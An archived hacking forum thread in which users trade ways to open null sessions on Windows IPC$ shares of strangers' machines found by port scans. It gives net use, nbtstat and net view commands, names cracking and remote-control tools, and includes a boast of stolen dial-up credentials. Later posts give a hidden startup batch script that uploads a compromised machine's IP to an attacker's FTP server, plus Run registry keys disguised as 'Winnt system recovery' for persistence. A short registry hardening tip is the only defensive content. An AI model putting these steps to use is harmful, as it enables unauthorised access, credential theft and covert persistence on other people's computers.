thanks guys..
Full Version: Win Nt Ipc$ ?
is it possible to hack, brute forcing or retrieve WIN NT IPC$ password remotely via WIN 98 ?
thanks guys..
thanks guys..
i noticed something awhile back..
when i tried access my computer (windows 2000 SP3) from a WinME machine.. i couldn't get past the IPC$ even with my own passwords.
the only way i could get past was by enabling a guest account on my machine (who would have ever thought?)
i'd be interested in seeing how secure IPC$ is
Kuun
when i tried access my computer (windows 2000 SP3) from a WinME machine.. i couldn't get past the IPC$ even with my own passwords.
the only way i could get past was by enabling a guest account on my machine (who would have ever thought?)
i'd be interested in seeing how secure IPC$ is
Kuun
hi ,
Inter-Process Communication (IPC) is a way of exchanging info between client and server in a windows environment.But using ipc$ share (a default hidden share in windows) a remote user can establish a null session. (A null session is where a computer or user can connect to a remote machine without providing a user ID or password)
To connect using a null session use the following command:
c:\>net use \\computer\ipc$ "" /user:""
But using an ipc$ u cannot hack into a machine
you can just enumerate the following
· The list of user accounts on that server
· RAS callback numbers
· Status of the account lockout for all users
· Last logged on date and time for user accounts
· Remote access to the Registry
· Status of all NTFS file permissions on the system
· Account policy on machine
· User rights on the machine
· List of services on the machine and their status
You can disable the default ipc$ share by setting the following registry key value to 2
HKLM\system\currentcontrolset\control\lsa\restrict annonymous
Regards
Shadow
Inter-Process Communication (IPC) is a way of exchanging info between client and server in a windows environment.But using ipc$ share (a default hidden share in windows) a remote user can establish a null session. (A null session is where a computer or user can connect to a remote machine without providing a user ID or password)
To connect using a null session use the following command:
c:\>net use \\computer\ipc$ "" /user:""
But using an ipc$ u cannot hack into a machine
you can just enumerate the following
· The list of user accounts on that server
· RAS callback numbers
· Status of the account lockout for all users
· Last logged on date and time for user accounts
· Remote access to the Registry
· Status of all NTFS file permissions on the system
· Account policy on machine
· User rights on the machine
· List of services on the machine and their status
You can disable the default ipc$ share by setting the following registry key value to 2
HKLM\system\currentcontrolset\control\lsa\restrict annonymous
Regards
Shadow
You Should Try A Program Called ' X-Scan ' It Searches Machines For Weak Vulnerablility's. You Can Get It At http://www.xFocus.org. It's Useful For "Hacking" Or Finding Weak Vuln's In Your Computer So You Can Patch Them Up.
-Layta
-Layta
nice info shadow, i used it and i got a successful prompt. here is my prompt :
D:\>net use \\xxx.xxx.xxx.xxx\ipc$ "" /user:""
The command completed successfully.
D:\>net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK \\195.146.48.251\ipc$ Microsoft Windows Network
The command completed successfully.
D:\>
now what ? what can i do ?
PS: i don't know much about the net command, i just know about the send and use commands. is there a good and complete tutorial or document about it on the net ?
thanx, andariel
D:\>net use \\xxx.xxx.xxx.xxx\ipc$ "" /user:""
The command completed successfully.
D:\>net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK \\195.146.48.251\ipc$ Microsoft Windows Network
The command completed successfully.
D:\>
now what ? what can i do ?
PS: i don't know much about the net command, i just know about the send and use commands. is there a good and complete tutorial or document about it on the net ?
thanx, andariel
| QUOTE |
now what ? what can i do ? |
| QUOTE |
you can just enumerate the following · The list of user accounts on that server · RAS callback numbers · Status of the account lockout for all users · Last logged on date and time for user accounts · Remote access to the Registry · Status of all NTFS file permissions on the system · Account policy on machine · User rights on the machine · List of services on the machine and their status |
not much
and there are docs on the net
just search using google..
at this time the remote windows share is mounted on your sustem. you can easyly copy files into the remote computer...and execute it whit NTcmd.exe but you must have a login and password.
use x scan !
use x scan !
google for ipcscan.exe
its awsome i have gained many a dial-up username and password with.
ipcscan.exe
and damware
Peace
NetComm
its awsome i have gained many a dial-up username and password with.
ipcscan.exe
and damware
Peace
NetComm
| QUOTE (jak3c @ Sep 9 2003, 07:23 PM) |
| at this time the remote windows share is mounted on your sustem. you can easyly copy files into the remote computer...and execute it whit NTcmd.exe but you must have a login and password. use x scan ! |
I'm trying in my LAN.
I have an admin account on local machine 192.168.100.25, and this is the classic Administrator/NULL.
So I can mount with net use all the share I want... but I cant use ntcmd.exe... how it work? Should it be the same of psexec.exe?
Another question guy... I tryed this method on internet also, making a little scan of 135/139 running box with simple account... if I try -net use x \\ip\sharedir "pass" /user:"user" - it does not work... mmmmh... I dont know what is wrong...
after you find someone with ports 135/139 open, your suppose to use the
Nbtstat -A xxx.xxx.xxx.xxx
command. that will tell if the person can share and what not. Whenever i use that command it doesn't work for me so I've learned to live without it. Instead you'll try using the
Net View \\xxx.xxx.xxx.xxx
command. That will show you shares they have. If nothing shows up, then try a guess at using there Ipc$ even if nothing shows. I've had nothing show and have had the ipc$ share still there. So try
Net Use \\xxx.xxx.xxx.xxx\ipc$ "" /user:""
If it comes back successful, then you can enumerate the share with lots of different programs. I use Enum and Winfo. There's others as well.
If the person ends up using a password for there shares(C$,Admin$,...). Then you can use Programs like NAT to try cracking the passwords. I have yet to have it work but i've heard it works within minutes of trying to guess. But there's also more programs for that too.
I have set the registry value, HKLM\system\currentcontrolset\control\lsa\restrict annonymous, to 2 and it didn't get rid of the ipc$ share.
Nbtstat -A xxx.xxx.xxx.xxx
command. that will tell if the person can share and what not. Whenever i use that command it doesn't work for me so I've learned to live without it. Instead you'll try using the
Net View \\xxx.xxx.xxx.xxx
command. That will show you shares they have. If nothing shows up, then try a guess at using there Ipc$ even if nothing shows. I've had nothing show and have had the ipc$ share still there. So try
Net Use \\xxx.xxx.xxx.xxx\ipc$ "" /user:""
If it comes back successful, then you can enumerate the share with lots of different programs. I use Enum and Winfo. There's others as well.
If the person ends up using a password for there shares(C$,Admin$,...). Then you can use Programs like NAT to try cracking the passwords. I have yet to have it work but i've heard it works within minutes of trying to guess. But there's also more programs for that too.
I have set the registry value, HKLM\system\currentcontrolset\control\lsa\restrict annonymous, to 2 and it didn't get rid of the ipc$ share.
| QUOTE (gephorce @ Feb 12 2004, 04:34 PM) |
| after you find someone with ports 135/139 open, your suppose to use the Nbtstat -A xxx.xxx.xxx.xxx command. that will tell if the person can share and what not. Whenever i use that command it doesn't work for me so I've learned to live without it. Instead you'll try using the Net View \\xxx.xxx.xxx.xxx command. That will show you shares they have. If nothing shows up, then try a guess at using there Ipc$ even if nothing shows. I've had nothing show and have had the ipc$ share still there. So try Net Use \\xxx.xxx.xxx.xxx\ipc$ "" /user:"" If it comes back successful, then you can enumerate the share with lots of different programs. I use Enum and Winfo. There's others as well. If the person ends up using a password for there shares(C$,Admin$,...). Then you can use Programs like NAT to try cracking the passwords. I have yet to have it work but i've heard it works within minutes of trying to guess. But there's also more programs for that too. I have set the registry value, HKLM\system\currentcontrolset\control\lsa\restrict annonymous, to 2 and it didn't get rid of the ipc$ share. |
nice explanation, thank you...
and really usefull the regkey for protect themself 
For me too the "nbtstat -a [or -A] IP" doesnt work... so I'm not alone, nice to see that lol
In some 139/135 scan I've found IP with \IPC$ null session workin... in their share I found the "SharedDocs" dir, the public share prvided by WinXP; if I map it with net use I can red/write inside... this looks cool for me, and I hope may execute also some proggy... is it possible?
there was an exploit for non-patched windows 98 few years ago.
try to find, it works well
try to find, it works well
You can use Computer Management to connect to there computer and enable services, etc... You can also use registry edit to do so. Using both, just go to file at top and you'll see remote connection options. (Not named that, but similar to )
If you enable Telnet, you can execute programs that way.
)If you enable Telnet, you can execute programs that way.
| QUOTE (gephorce @ Feb 12 2004, 11:18 PM) |
| You can use Computer Management to connect to there computer and enable services, etc... You can also use registry edit to do so. Using both, just go to file at top and you'll see remote connection options. (Not named that, but similar to ) If you enable Telnet, you can execute programs that way. |
who do you reply?
for doing this I think you must have ad admin account...
try to use ntscan modul when there is an ipc$ account ...
i think this is ntcmd
or you can use dameware nt utilities
this is a very nice tool
so,
if you can find an ipc$ account, and if you can t use it,
maybe you have a firewall ?
or try to see in the regedit if the restricanonymous = 0
plex
i think this is ntcmd
or you can use dameware nt utilities
this is a very nice tool
so,
if you can find an ipc$ account, and if you can t use it,
maybe you have a firewall ?
or try to see in the regedit if the restricanonymous = 0
plex
argg
i can t made a new post
so
is any one know a program whitch can tel me the @ip of the machine where it was installed ...
i can use an dyndns for exemple ... is there any one invisible ?
thx
plex
i can t made a new post
so
is any one know a program whitch can tel me the @ip of the machine where it was installed ...
i can use an dyndns for exemple ... is there any one invisible ?
thx
plex
The best solution is to put a bot irc on your stro, so you can take the new ip when it connects,
but u can write too a batch to who send the new ip on a ftp :
but u can write too a batch to who send the new ip on a ftp :
| CODE |
waitfor 300 (to wait for the connection) ipconfig >> c:\IP.txt echo open IPOFTHEFTP PORTOFTHEFTP >> c:\temp.ini echo user >> c:\temp.ini echo pass >> c:\temp.ini echo put c:\1.txt >> c:\temp.ini echo quit >> c:\temp.ini ftp -s:c:\temp.ini exit |
And you have to run this batch silently at the startup with hiderun or hidden32.
Sorry for my english
[EDIT]
You have to download waitfor.exe and put him in the %windir% directory
oYost u understand my question and this is a good reply,
but i know this 2 methods ...
in fact
firt, with an ipconfig /all maybe you dont have the correct ip ... if there is for exemple a routeur(in french lol) (you know ?? routeur ?? cisco ?? lol)
I have my batch file you know and hidden 32 :-p
to put the program on the boot
2 keys for regedit
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>root.reg
echo "Winnt system recovery"="c:\\projet\\run.bat /yes">>root.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>root.reg
echo "Winnt system recovery"="c:\\projet\\hide.bat /yes">>root.reg
...
in fact i m looking for any cmd to put the very @ip published on Internet in the .txt
but there is come programmes like direct update for dyndns.org ... for exemple...
maybe there is any one very simple and invisible :-D
plex
i like this forum :-D
Thx oYost
but why can i made new post
but i know this 2 methods ...
in fact
firt, with an ipconfig /all maybe you dont have the correct ip ... if there is for exemple a routeur(in french lol) (you know ?? routeur ?? cisco ?? lol)
I have my batch file you know and hidden 32 :-p
to put the program on the boot
2 keys for regedit
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>root.reg
echo "Winnt system recovery"="c:\\projet\\run.bat /yes">>root.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>root.reg
echo "Winnt system recovery"="c:\\projet\\hide.bat /yes">>root.reg
...
in fact i m looking for any cmd to put the very @ip published on Internet in the .txt
but there is come programmes like direct update for dyndns.org ... for exemple...
maybe there is any one very simple and invisible :-D
plex
i like this forum :-D
Thx oYost
but why can i made new post
Hehe, on peut parler francais de france alors 
, non on va sfaire kicker mais juste pour ce poste :
"in fact i m looking for any cmd to put the very @ip published on Internet in the .txt"
Ca faut que tu m'explique en francais
Sorry all for this little speech in French, to translate http://tr.voila.fr/
, non on va sfaire kicker mais juste pour ce poste : "in fact i m looking for any cmd to put the very @ip published on Internet in the .txt"
Ca faut que tu m'explique en francais
Sorry all for this little speech in French
, to translate http://tr.voila.fr/
ok mec
i m looking for a command whitch tel me the @ip published on the internet
when you have a routeur like a cisco ...
with an ipconfig /all
you 'll have
lan ip 192.168.0.1 for exemple
MSR 255.255.255.0 for exemple
gateway ... 192.168.0.254
the dns ...
but not the right ip ( like 24.25.26.21 )
Thx :-D
i m looking for a command whitch tel me the @ip published on the internet
when you have a routeur like a cisco ...
with an ipconfig /all
you 'll have
lan ip 192.168.0.1 for exemple
MSR 255.255.255.0 for exemple
gateway ... 192.168.0.254
the dns ...
but not the right ip ( like 24.25.26.21 )
Thx :-D
Ok, so use netstat -r
Enjoy
Enjoy
===========================================================================
Liste d'Interfaces
0x1 ........................... MS TCP Loopback interface
0x1000003 ...00 01 03 0b 72 89 ...... 3Com EtherLink PCI
===========================================================================
===========================================================================
Itin,raires actifsÿ:
Destination r,seau Masque r,seau Adr. passerelle Adr. interface M,trique
0.0.0.0 0.0.0.0 192.168.0.254 192.168.0.50 1
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
192.168.0.0 255.255.255.0 192.168.0.50 192.168.0.50 1
192.168.0.50 255.255.255.255 127.0.0.1 127.0.0.1 1
192.168.0.255 255.255.255.255 192.168.0.50 192.168.0.50 1
224.0.0.0 224.0.0.0 192.168.0.50 192.168.0.50 1
255.255.255.255 255.255.255.255 192.168.0.50 192.168.0.50 1
Passerelle par d,fautÿ: 192.168.0.254
===========================================================================
Itin,raires persistantsÿ:
Aucun
Table de routage
----
does'nt work
I had already try this you know ...
this is because of the cisco routeur ...
Liste d'Interfaces
0x1 ........................... MS TCP Loopback interface
0x1000003 ...00 01 03 0b 72 89 ...... 3Com EtherLink PCI
===========================================================================
===========================================================================
Itin,raires actifsÿ:
Destination r,seau Masque r,seau Adr. passerelle Adr. interface M,trique
0.0.0.0 0.0.0.0 192.168.0.254 192.168.0.50 1
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
192.168.0.0 255.255.255.0 192.168.0.50 192.168.0.50 1
192.168.0.50 255.255.255.255 127.0.0.1 127.0.0.1 1
192.168.0.255 255.255.255.255 192.168.0.50 192.168.0.50 1
224.0.0.0 224.0.0.0 192.168.0.50 192.168.0.50 1
255.255.255.255 255.255.255.255 192.168.0.50 192.168.0.50 1
Passerelle par d,fautÿ: 192.168.0.254
===========================================================================
Itin,raires persistantsÿ:
Aucun
Table de routage
----
does'nt work
I had already try this you know ...
this is because of the cisco routeur ...
oh sorry, i thought it was working...
hum it's hard to found on google ^^ but on vbfrance there is a source code to know his @ip :
http://www.vbfrance.com/code.aspx?ID=4414
I haven't compile it but you can try and maybe modify it to create a file text which contain the IP, good luck
hum it's hard to found on google ^^ but on vbfrance there is a source code to know his @ip :
http://www.vbfrance.com/code.aspx?ID=4414
I haven't compile it but you can try and maybe modify it to create a file text which contain the IP, good luck
Why Don't you just go to Www.Whatismyip.com ?
I can't make new posts either, it sucks.
I can't make new posts either, it sucks.
but ... in a batch file ... you can't take this @ip and put it in a txt file ..
i'll try visualbasic :-p
i'll try visualbasic :-p
how come I cannot connect with the standard administrator/null on a xp home box?
hmm i wrote a vb app that pulls the info from my router, parses it and spits out the wan ip, but you'd have to configure the code to work on different router. Thats the only way i found to get the Wan ip without connecting to a remote site.
| QUOTE |
| how come I cannot connect with the standard administrator/null on a xp home box? |
Xp home only allows guest logins... This is part of simple file sharing, which can't be disabled in xp home, as far as I know. This means, there really is no way to log on remotely to a xp home machine except as a guest.
To scan IPC, fxscanner is very nice, u can install remotely and then use dameware to access the machine..
| QUOTE (caleb @ Feb 19 2004, 04:38 PM) | ||
Xp home only allows guest logins... This is part of simple file sharing, which can't be disabled in xp home, as far as I know. This means, there really is no way to log on remotely to a xp home machine except as a guest. |
ok, thanks alot for that info!
It has been nagging me !
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
